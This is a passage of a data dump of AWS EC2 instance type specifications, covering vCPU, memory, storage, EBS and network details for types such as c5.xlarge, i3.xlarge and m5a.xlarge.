'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 7680, 'TotalSizeInGB': 80, 'Disks': [{'SizeInGB': 40, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 500, 'BaselineThroughputInMBps': 62.5, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 500, 'MaximumThroughputInMBps': 62.5, 'MaximumIops': 4000}, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm', 'paravirtual'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 7680}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 80, 'Disks': [{'SizeInGB': 40, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 500, 'BaselineThroughputInMBps': 62.5, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 500, 'MaximumThroughputInMBps': 62.5, 'MaximumIops': 4000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 7680, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 750, 'BaselineThroughputInMBps': 93.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 750, 'MaximumThroughputInMBps': 93.75, 'MaximumIops': 6000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 7680}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 750, 'BaselineThroughputInMBps': 93.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 750, 'MaximumThroughputInMBps': 93.75, 'MaximumIops': 6000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'TotalSizeInGB': 100, 'Disks': [{'SizeInGB': 100, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 100, 'Disks': [{'SizeInGB': 100, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 31232, 'TotalSizeInGB': 950, 'Disks': [{'SizeInGB': 950, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 850, 'BaselineThroughputInMBps': 106.25, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 850, 'MaximumThroughputInMBps': 106.25, 'MaximumIops': 6000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'i3.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 31232}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 950, 'Disks': [{'SizeInGB': 950, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 850, 'BaselineThroughputInMBps': 106.25, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 850, 'MaximumThroughputInMBps': 106.25, 'MaximumIops': 6000}, 'NvmeSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1], 'SizeInMiB': 15360, 'TotalSizeInGB': 80, 'Disks': [{'SizeInGB': 40, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 500, 'BaselineThroughputInMBps': 62.5, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 500, 'MaximumThroughputInMBps': 62.5, 'MaximumIops': 4000}, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 'm3.xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm', 'paravirtual'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 15360}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 80, 'Disks': [{'SizeInGB': 40, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 500, 'BaselineThroughputInMBps': 62.5, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 500, 'MaximumThroughputInMBps': 62.5, 'MaximumIops': 4000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.4, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 750, 'BaselineThroughputInMBps': 93.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 750, 'MaximumThroughputInMBps': 93.75, 'MaximumIops': 6000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm4.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.4}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 750, 'BaselineThroughputInMBps': 93.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 750, 'MaximumThroughputInMBps': 93.75, 'MaximumIops': 6000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1085, 'BaselineThroughputInMBps': 135.625, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5a.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1085, 'BaselineThroughputInMBps': 135.625, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1085, 'BaselineThroughputInMBps': 135.625, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5ad.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': 